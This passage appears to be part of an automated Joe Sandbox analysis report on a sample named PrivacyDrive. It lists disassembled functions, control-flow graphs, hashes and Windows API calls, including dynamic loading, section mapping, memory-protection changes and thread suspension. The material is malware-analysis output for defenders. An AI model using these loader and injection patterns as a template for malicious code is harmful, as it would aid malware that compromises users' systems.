                                • Instruction Fuzzy Hash: 5DD24B76954B20CFD758DFB6EC8696A3762F7B0304341B62ED403871E5CF38194AAAC5
                                Function 0050E674 Relevance: 36.9, APIs: 3, Strings: 17, Instructions: 1859librarymemoryloaderCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 354 50e674-50e6c7 355 50e6d6-5102bc call 4593c2 call 49bcae call 5249ea call 4f8465 call 4e2efb call 4ebeef call 525a85 call 4036ec call 4abe3e call 448363 call 46a71d call 5291f3 call 447018 call 413548 call 520a49 call 44051a call 4bd628 call 516871 call 4cc508 call 4ab3af call 402ce9 call 479830 call 40d31f call 43a59a call 48dcb9 call 497ca0 call 47b808 call 413753 call 4d1edc call 4a9582 call 4a6411 call 5102bd call 50002c call 51922c call 50a64d call 4b2145 call 42e1fc call 40d646 call 4ab98f call 49893a call 40dcd3 call 50238e call 4e6246 call 41abc4 call 524579 call 48fd28 call 487488 call 444146 call 41d210 call 4da792 call 4f4f4d call 46d6e5 call 4018d3 call 4886e3 call 4f59fb call 4520bd LoadLibraryW call 426132 call 42835b call 4bde24 call 403f35 call 45dd61 call 4dc543 call 46b827 call 4e2efb call 461f77 call 527eea call 4b83bc call 477c39 call 456cfa call 4cfe83 call 4eda0f call 4adda6 call 4f7443 call 4e63c2 call 4fa923 call 4b774d call 48f926 call 46b827 call 4388d8 call 402669 call 490841 call 4af3a9 call 51a96c call 466647 call 4616e9 call 4739c2 call 5102bd call 46e8e8 call 4694c8 call 4e2efb call 445ba8 call 4e1af0 call 4bde24 call 4159d4 call 444c56 call 48b270 call 492a17 call 4eecb1 call 504436 call 49f464 call 49f530 call 46a204 call 4f7be7 call 41437d call 499c9a call 5102bd call 454e5a call 4fca22 call 42b7e8 call 512d6c call 42072b call 4747b0 call 4011f9 call 47bc45 call 487354 GetProcAddress call 45a31c call 5102bd call 40c6f1 call 42a1b6 call 4e0a1b call 51ea40 call 448976 call 4654b2 call 4bae56 call 4a291a call 4f8465 call 47dc6a call 49d761 call 407fff call 437a48 call 4804fc call 4f5469 call 43c850 call 4159d4 call 4ebeef call 4f9c29 call 47575e call 4c6ab2 call 42d85b call 4739c2 call 476def call 453710 call 487d9d call 52ca20 call 4db3b0 call 4a2468 call 515b7e call 44f7f2 call 4c7325 call 47cb5e call 47674c call 4a39c9 call 49f37e call 480d76 call 44463a call 4616e9 call 4d85b7 VirtualAlloc call 40da0f call 443572 call 47ab98 call 4f4985 call 4685a4 call 4230b6 call 443572 call 4b7a2d call 43b794 call 4546db call 4f52d5 call 4ad924 call 49c133 call 405eb0 call 486b07 call 50c9b2 354->355 356 50e6d1 call 4d7d21 354->356 356->355
                                APIs
                                • LoadLibraryW.KERNEL32(?,-00000001C816EF8F,-D3472FE1,00000000,?,-37466A7C), ref: 0050EFD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0050F8DC
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressAllocLibraryLoadProcVirtual
                                • String ID: I\$5H\$5V\$=\$=6\$=]\$=h\$!J\$!5v\$!5{\$!=Q\$)=\\$1=7\$3=\$N)5X\$:5$l]
                                • API String ID: 4074058790-3398654432
                                • Opcode ID: e851c25e3e48dfe5a46926cc7a2b28c99539beb22ae8fd77874ea49fb4427dbe
                                • Instruction ID: d2289b821f783aacf1f91394e5df425eff50f6776758f94baca2d9f2921533a3
                                • Opcode Fuzzy Hash: e851c25e3e48dfe5a46926cc7a2b28c99539beb22ae8fd77874ea49fb4427dbe
                                • Instruction Fuzzy Hash: 7ED24B76954B20CFD758DFBAEC8696A3762F7B0304341B62ED403871E5CF38194AAAC5
                                Function 0050F158 Relevance: 22.1, APIs: 2, Strings: 10, Instructions: 1143librarymemoryloaderCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(00000000), ref: 0050F8DC
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressAllocProcVirtual
                                • String ID: =6\$=]\$=h\$!J\$!5{\$)=\\$1=7\$3=\$:5$l]
                                • API String ID: 2770133467-2676442670
                                • Opcode ID: 4c56733f69eaa6b33f9705d39bcb6a5dc64e2338d2ffb348a4e9b076d671747d
                                • Instruction ID: 327a959ee4ffdb57f71688f4b249be64711144f05ad95c8dd03decab71dfb643
                                • Opcode Fuzzy Hash: 4c56733f69eaa6b33f9705d39bcb6a5dc64e2338d2ffb348a4e9b076d671747d
                                • Instruction Fuzzy Hash: 9C825C77954B20CFC758DFBAEC8695A3762F7E0304342A62ED402971E5CF38194EAAC5
                                Function 00FDC583 Relevance: 11.2, APIs: 7, Instructions: 742memorynativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00FDC643
                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00FDC6EF
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?), ref: 00FDCA5A
                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00FDCB0F
                                • VirtualProtect.KERNEL32(?,?,00000008,?), ref: 00FDCB2C
                                • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00FDCBD1
                                • VirtualProtect.KERNEL32(?,?,00000002,00000000), ref: 00FDCC06
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$ProtectSection$View$AllocCreate
                                • String ID:
                                • API String ID: 2664363762-0
                                • Opcode ID: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
                                • Instruction ID: 26bb833aecf02567d4292cd4c7da8ff9ab0c92b334022f9a2c5e5552716236d0
                                • Opcode Fuzzy Hash: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
                                • Instruction Fuzzy Hash: 5B428F72A043029FDB24CF24CC44B6AB7EAAF84714F18492EF995DB341D774E941EB92
                                Function 0050F955 Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 615memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: =]\$=h\$)=\\$1=7\$3=\$l]
                                • API String ID: 4275171209-3216202953
                                • Opcode ID: ebe4869e19d5f7c516b3a384fec4e1fdc3117d1933cf8fae32f719dbc3b3faac
                                • Instruction ID: 9a05f524823c9e390478221f60b4dbb571e86af1ee666c2076af2e1e642025c5
                                • Opcode Fuzzy Hash: ebe4869e19d5f7c516b3a384fec4e1fdc3117d1933cf8fae32f719dbc3b3faac
                                • Instruction Fuzzy Hash: DB221A72854B20CFD758DFB9EC96D6A3762F7E0304342A62ED403971E5CF38194AAAC5
                                Function 0050F974 Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 609memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: =]\$=h\$)=\\$1=7\$3=\$l]
                                • API String ID: 4275171209-3216202953
                                • Opcode ID: 75132aa80ec677986a861b1b84a842cf09d0a9801579e7800dd8ad61ea67b34c
                                • Instruction ID: 98bcd29253916265840648f9ade71dd15fd9564f42f5f3c2623c35f94a07c134
                                • Opcode Fuzzy Hash: 75132aa80ec677986a861b1b84a842cf09d0a9801579e7800dd8ad61ea67b34c
                                • Instruction Fuzzy Hash: 36221A72854B20CFD758DFB9EC86D6A3762F7E0304342A62ED503971E5CF38194AAAC5
                                Function 051AF7B0 Relevance: 10.4, Strings: 8, Instructions: 390COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1362 51af7b0-51af7f0 1363 51af7f2 1362->1363 1364 51af826-51af936 1362->1364 1365 51af800-51af824 call 51b1bc0 1363->1365 1366 51af938 1364->1366 1367 51af966-51af998 1364->1367 1365->1364 1371 51af940-51af964 call 51b1cc0 1366->1371 1368 51af99a 1367->1368 1369 51af9c9-51af9d8 call 51b0760 1367->1369 1372 51af9a0-51af9c7 call 51b1c40 1368->1372 1378 51af9dd-51af9e2 1369->1378 1371->1367 1372->1369 1380 51af9e8-51afa0d 1378->1380 1381 51afae4-51afae6 1378->1381 1383 51afa0f 1380->1383 1384 51afa36-51afa3f 1380->1384 1382 51afcc2-51afccc 1381->1382 1385 51afa10-51afa34 call 51b1d40 1383->1385 1386 51afa40-51afa4a 1384->1386 1385->1384 1387 51afa4c-51afa4f 1386->1387 1388 51afa51-51afa59 1386->1388 1387->1386 1387->1388 1390 51afa5f-51afa7c 1388->1390 1391 51afcb2-51afcbe call 51e3160 1388->1391 1393 51afa7e-51afa7f 1390->1393 1394 51afaa6-51afab1 1390->1394 1391->1382 1396 51afa80-51afaa4 call 51b1dc0 1393->1396 1397 51afaeb 1394->1397 1398 51afab3-51afab7 1394->1398 1396->1394 1400 51afaed-51afaef 1397->1400 1402 51afac7-51afacb 1398->1402 1403 51afcaa 1400->1403 1404 51afaf5-51afb36 1400->1404 1402->1403 1406 51afad1-51afad8 1402->1406 1403->1391 1407 51afb38 1404->1407 1408 51afb66-51afb71 1404->1408 1409 51afada-51afadc 1406->1409 1410 51afade 1406->1410 1411 51afb40-51afb64 call 51b1e50 1407->1411 1412 51afb73-51afb7b 1408->1412 1413 51afba4 1408->1413 1409->1410 1414 51afac0-51afac5 1410->1414 1415 51afae0-51afae2 1410->1415 1411->1408 1418 51afb87-51afb8b 1412->1418 1416 51afba6-51afba8 1413->1416 1414->1400 1414->1402 1415->1414 1416->1403 1419 51afbae-51afbd3 1416->1419 1418->1403 1421 51afb91-51afb98 1418->1421 1422 51afc06-51afc0d 1419->1422 1423 51afbd5 1419->1423 1424 51afb9a-51afb9c 1421->1424 1425 51afb9e 1421->1425 1427 51afc0f-51afc1c 1422->1427 1428 51afc40-51afc4c 1422->1428 1426 51afbe0-51afc04 call 51b1ed0 1423->1426 1424->1425 1429 51afb80-51afb85 1425->1429 1430 51afba0-51afba2 1425->1430 1426->1422 1432 51afc27-51afc2b 1427->1432 1433 51afcd3-51afcd8 1428->1433 1429->1416 1429->1418 1430->1429 1432->1403 1435 51afc2d-51afc34 1432->1435 1433->1391 1436 51afc3a 1435->1436 1437 51afc36-51afc38 1435->1437 1438 51afc3c-51afc3e 1436->1438 1439 51afc20-51afc25 1436->1439 1437->1436 1438->1439 1439->1432 1440 51afc51-51afc53 1439->1440 1440->1403 1441 51afc55-51afc6b 1440->1441 1441->1433 1442 51afc6d-51afc6f 1441->1442 1443 51afc73-51afc76 1442->1443 1444 51afc78-51afc98 call 51b17c0 1443->1444 1445 51afccd 1443->1445 1448 51afc9a-51afca0 1444->1448 1449 51afca2-51afca8 1444->1449 1445->1433 1448->1443 1448->1449 1449->1433
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: 2$1.$2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/api$6(>*$=:li$Ga!1$ZABC$IK$MSO
                                • API String ID: 0-703293956
                                • Opcode ID: 8e6c78eead6cdce8916548d87214fd1e2466242cc5dfe16290e2db02727c0ebd
                                • Instruction ID: f54ae8ac2b9862b0da7133ac4830c46d78114b6ceabc4f0b85a40ec0d227fced
                                • Opcode Fuzzy Hash: 8e6c78eead6cdce8916548d87214fd1e2466242cc5dfe16290e2db02727c0ebd
                                • Instruction Fuzzy Hash: D1D19BB920C3808BD312EF19C494A6FBBE1BF96644F180D1CE4D19B356D376D94ACB92
                                Function 00F80C6F Relevance: 7.6, APIs: 5, Instructions: 100threadprocessCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 f80c6f-f80cb6 CreateToolhelp32Snapshot 1453 f80d8c-f80d8f 1450->1453 1454 f80cbc-f80cdd Thread32First 1450->1454 1455 f80d78-f80d8a CloseHandle 1454->1455 1456 f80ce3-f80ce9 1454->1456 1455->1453 1457 f80d58-f80d72 1456->1457 1458 f80ceb-f80cf1 1456->1458 1457->1455 1457->1456 1458->1457 1459 f80cf3-f80d12 1458->1459 1459->1457 1462 f80d14-f80d18 1459->1462 1463 f80d1a-f80d2e Wow64SuspendThread 1462->1463 1464 f80d30-f80d3f 1462->1464 1465 f80d44-f80d56 CloseHandle 1463->1465 1464->1465 1465->1457
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00F807B5,?,00000001,?,81EC8B55,000000FF), ref: 00F80CAD
                                • Thread32First.KERNEL32(00000000,0000001C), ref: 00F80CD9
                                • Wow64SuspendThread.KERNEL32(00000000), ref: 00F80D2C
                                • CloseHandle.KERNEL32(00000000), ref: 00F80D56
                                • CloseHandle.KERNEL32(00000000), ref: 00F80D8A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                                • String ID:
                                • API String ID: 2720937676-0
                                • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                • Instruction ID: 06c4034115f0a3ed69fca0106cad70a3f8664a1b41fdfe3747f613553170cefb
                                • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                • Instruction Fuzzy Hash: 0F410071A00108AFDB58DF98C890FEDB7B6EF88310F50C168EA159B7A4DE34AE45CB54
                                Function 00F80B1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1530 f80b1f-f80b76 GetPEB 1531 f80b81-f80b85 1530->1531 1532 f80b8b-f80b96 1531->1532 1533 f80c25-f80c2c 1531->1533 1534 f80b9c-f80bb3 1532->1534 1535 f80c20 1532->1535 1536 f80c37-f80c3b 1533->1536 1537 f80bd8-f80bf0 CreateThread 1534->1537 1538 f80bb5-f80bd6 1534->1538 1535->1531 1540 f80c4c-f80c53 1536->1540 1541 f80c3d-f80c4a 1536->1541 1545 f80bf4-f80bfc 1537->1545 1538->1545 1543 f80c5c-f80c61 1540->1543 1544 f80c55-f80c57 1540->1544 1541->1536 1544->1543 1545->1535 1547 f80bfe-f80c1b 1545->1547 1547->1535
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00F80BEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID: ,
                                • API String ID: 2422867632-3772416878
                                • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                • Instruction ID: 33ef80dc20ee9b4d76a97a08f04e5d2cd0581586a94a501bb0da34b32c5f70b1
                                • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                • Instruction Fuzzy Hash: 5641D274E00209EFDB04DF98C994BAEB7B1BF88314F208698D515AB390C771AE85DB94
                                Function 00F8055F Relevance: 1.9, APIs: 1, Instructions: 399threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1578 f8055f-f806c7 call f80b0f call f8110f call f812bf call f80eaf 1587 f80af8-f80afb 1578->1587 1588 f806cd-f806d4 1578->1588 1589 f806df-f806e3 1588->1589 1590 f80705-f80780 GetPEB 1589->1590 1591 f806e5-f80703 call f8102f 1589->1591 1593 f8078b-f8078f 1590->1593 1591->1589 1595 f80791-f807a5 1593->1595 1596 f807a7-f807b9 call f80c6f 1593->1596 1595->1593 1601 f807bb-f807e1 1596->1601 1602 f807e3-f80804 CreateThread 1596->1602 1603 f80807-f8080b 1601->1603 1602->1603 1605 f80acc-f80aef 1603->1605 1606 f80811-f80844 call f8116f 1603->1606 1605->1587 1606->1605 1610 f8084a-f80899 1606->1610 1612 f808a4-f808aa 1610->1612 1613 f808ac-f808b2 1612->1613 1614 f808f2-f808f6 1612->1614 1615 f808b4-f808c3 1613->1615 1616 f808c5-f808c9 1613->1616 1617 f808fc-f80909 1614->1617 1618 f809c4-f80ab7 call f80c6f call f80b0f call f8110f 1614->1618 1615->1616 1619 f808cb-f808d9 1616->1619 1620 f808f0 1616->1620 1621 f80914-f8091a 1617->1621 1644 f80ab9 1618->1644 1645 f80abc-f80ac6 1618->1645 1619->1620 1622 f808db-f808ed 1619->1622 1620->1612 1625 f8094a-f8094d 1621->1625 1626 f8091c-f8092a 1621->1626 1622->1620 1630 f80950-f80957 1625->1630 1628 f80948 1626->1628 1629 f8092c-f8093b 1626->1629 1628->1621 1629->1628 1632 f8093d-f80946 1629->1632 1630->1618 1634 f80959-f80962 1630->1634 1632->1625 1634->1618 1635 f80964-f80974 1634->1635 1637 f8097f-f8098b 1635->1637 1639 f809bc-f809c2 1637->1639 1640 f8098d-f809ba 1637->1640 1639->1630 1640->1637 1644->1645 1645->1605
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00F80802
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
                                • Instruction ID: a57c21139efe5916b6d03124d9e302a36767b236be3bf935890f621e18efca2b
                                • Opcode Fuzzy Hash: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
                                • Instruction Fuzzy Hash: B012DFB1E00219DBDB14DF98C990BEDBBB2FF88304F2482A9D515AB385C7346A45DF54
                                Function 051DF006 Relevance: 1.5, APIs: 1, Instructions: 32comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(051EDCE0,00000000,00000001,051EDCD0,?), ref: 051DF04D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID:
                                • API String ID: 542301482-0
                                • Opcode ID: efd77b52fca481ee7f69be9ed565739cd331511d377ecf876901d663429dadad
                                • Instruction ID: 9989dea6275414d5079e5a4f4fbc0e73253d7f88dfaf0ba42297db4796d4c02d
                                • Opcode Fuzzy Hash: efd77b52fca481ee7f69be9ed565739cd331511d377ecf876901d663429dadad
                                • Instruction Fuzzy Hash: D8F065B02483409FF3118F10CDA9B86BFE5EF0A700F16448DE5851F6D2C3B96885DB61
                                Function 051E6730 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LdrInitializeThunk.NTDLL(051E9F2B,?,00000006,?,?,00000018,?,?,?), ref: 051E675E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                Function 051EA1E0 Relevance: .1, Instructions: 139COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f032243683081d6106578b9e1883fb672f8f9d5322ac3019429970b3748cab80
                                • Instruction ID: cf684927cb8f22e0a9fb481820cdb780f8ab0ba0a3e3ef1978311991df551f5a
                                • Opcode Fuzzy Hash: f032243683081d6106578b9e1883fb672f8f9d5322ac3019429970b3748cab80
                                • Instruction Fuzzy Hash: E941913460C701ABE724AF14D899F2EBBE6FF85714F64881CF58697291D331E850CB56
                                Function 051AD3C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1320 51ad3c0-51ad3cb call 51e4c50 1323 51ad5ae-51ad5b0 ExitProcess 1320->1323 1324 51ad3d1-51ad3e0 GetInputState call 51dc320 1320->1324 1327 51ad5a9 call 51e6130 1324->1327 1328 51ad3e6-51ad41b GetCurrentThreadId GetCurrentProcessId 1324->1328 1327->1323 1329 51ad41d-51ad41f 1328->1329 1330 51ad446-51ad463 1328->1330 1332 51ad420-51ad444 call 51ad5c0 1329->1332 1333 51ad496-51ad498 1330->1333 1334 51ad465 1330->1334 1332->1330 1335 51ad49e-51ad4b4 1333->1335 1336 51ad546-51ad568 1333->1336 1338 51ad470-51ad494 call 51ad630 1334->1338 1339 51ad4e9-51ad512 1335->1339 1340 51ad4b6 1335->1340 1342 51ad56a 1336->1342 1343 51ad596-51ad59d call 51aee70 1336->1343 1338->1333 1339->1336 1347 51ad514 1339->1347 1346 51ad4c0-51ad4e7 call 51ad6b0 1340->1346 1348 51ad570-51ad594 call 51ad7b0 1342->1348 1343->1327 1354 51ad59f call 51b2610 1343->1354 1346->1339 1352 51ad520-51ad544 call 51ad720 1347->1352 1348->1343 1352->1336 1360 51ad5a4 call 51b0750 1354->1360 1360->1327
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CurrentProcess$ExitInputStateThread
                                • String ID: clmn$ohij
                                • API String ID: 1029096631-3567580053
                                • Opcode ID: a6e2b13fedefa1d046faa577f965abc0a0eb7a379cb262bd463d76407c2030b7
                                • Instruction ID: f0c56124ecf909d7ce495db0d89239fa6b0ca6bd926f14153cf7a15e503f8b64
                                • Opcode Fuzzy Hash: a6e2b13fedefa1d046faa577f965abc0a0eb7a379cb262bd463d76407c2030b7
                                • Instruction Fuzzy Hash: 9041577950C380ABD702AF68E558A1EFFF5AF92605F148D0CE4C88B652C736D840CB63
                                Function 051DF073 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
